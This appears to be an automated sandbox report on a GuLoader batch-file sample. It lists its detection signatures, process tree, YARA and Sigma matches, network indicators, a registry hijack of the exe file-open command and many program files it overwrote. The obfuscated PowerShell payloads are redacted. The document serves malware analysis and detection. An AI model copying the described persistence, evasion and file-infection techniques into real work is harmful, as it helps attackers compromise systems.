Windows Analysis Report
kam.cmd

Overview

General Information

Sample name: kam.cmd
Analysis ID: 1446714
MD5: c7b720a0f6bffebe027826a2508c52dc
SHA1: 41b21cdcd0afd9363d1c79202d687c65fc6128b4
SHA256: c67dbe7d1bfb36fcab8391ea0728382445c106fb08ad19f9a3fb3777cdef5562

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 1196 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1716 cmdline: powershell.exe -windowstyle hidden "<obfuscated PowerShell payload removed>" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4856 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5572 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell payload removed>" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 4428 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 1272 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.2409553300.00000000074A0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000006.00000002.2407208321.00000000061C3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000006.00000002.2418645721.000000000966A000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
Process Memory Space: powershell.exe PID: 1716 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings
amsi64_1716.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_5572.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | matched strings listed below
  • 0xe066:$b2: ::FromBase64String(
  • 0xd139:$s1: -join
  • 0x68e5:$s4: +=
  • 0x69a7:$s4: +=
  • 0xabce:$s4: +=
  • 0xcceb:$s4: +=
  • 0xcfd5:$s4: +=
  • 0xd11b:$s4: +=
  • 0x17053:$s4: +=
  • 0x170d3:$s4: +=
  • 0x17199:$s4: +=
  • 0x17219:$s4: +=
  • 0x173ef:$s4: +=
  • 0x17473:$s4: +=
  • 0xd90b:$e4: Get-WmiObject
  • 0xdafa:$e4: Get-Process
  • 0xdb52:$e4: Start-Process
  • 0x15b62:$e4: Get-Process

              System Summary

              Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\svchost.com "%1" %*, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 1272, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
              Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "<obfuscated PowerShell payload removed>"
              No Snort rule has matched

              AV Detection

              Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.3% probability
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Joe Sandbox ML: detected
              Source: unknown | HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbS source: powershell.exe, 00000006.00000002.2410289196.00000000079ED000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: @ntkrnlmp.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officeappguardwin32.pdb source: officeappguardwin32.exe.9.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbW source: powershell.exe, 00000006.00000002.2410289196.00000000079ED000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: lambda_methodCore.pdb source: powershell.exe, 00000006.00000002.2416249131.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.* source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.9.dr
              Source: Binary string: @winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.9.dr
              Source: Binary string: )"WINLOA~1.PDBk,"$5,"$5," source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wab.pdbGCTL source: OfficeScrSanBroker.exe.9.dr, jucheck.exe.9.dr, officeappguardwin32.exe.9.dr, dbcicons.exe.9.dr, sscicons.exe.9.dr, notification_click_helper.exe.9.dr, accicons.exe.9.dr
              Source: Binary string: wab.pdb source: OfficeScrSanBroker.exe.9.dr, jucheck.exe.9.dr, officeappguardwin32.exe.9.dr, dbcicons.exe.9.dr, sscicons.exe.9.dr, notification_click_helper.exe.9.dr, accicons.exe.9.dr
              Source: Binary string: in32.pdb source: officeappguardwin32.exe.9.dr
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2402584546.0000000003515000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officescrsanbroker.pdbbroker.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OfficeScrSanBroker.exe.9.dr
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officescrsanbroker.pdb source: OfficeScrSanBroker.exe.9.dr
              Source: Binary string: ,"4winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officeappguardwin32.pdbin32.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officeappguardwin32.exe.9.dr
              Source: Binary string: LC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: broker.pdb source: OfficeScrSanBroker.exe.9.dr
              Source: Binary string: @winload_prod.pdbf,"@ source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: )"WINLOA~1.PDB source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp

              Spreading

              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
